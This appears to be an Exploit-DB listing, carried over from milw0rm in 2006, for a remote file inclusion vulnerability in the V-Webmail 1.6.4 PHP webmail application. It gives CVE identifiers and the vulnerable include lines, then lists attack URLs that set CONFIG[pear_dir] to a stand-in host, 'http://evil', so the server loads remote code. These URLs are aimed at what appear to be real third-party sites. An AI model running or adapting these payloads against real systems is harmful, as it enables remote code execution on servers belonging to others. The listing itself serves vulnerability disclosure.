V-Webmail 1.6.4 - 'pear_dir' Remote File Inclusion

Author: beford
type: webapps
platform: php
port: 
date_added: 2006-05-24  
date_updated: 2016-07-29  
verified: 1  
codes: OSVDB-26086;CVE-2006-2666;OSVDB-26085;CVE-2006-2665  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comv-webmail-1.6.4.tar.gz  

raw file: 1827.txt  
Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

# milw0rm.com [2006-05-25]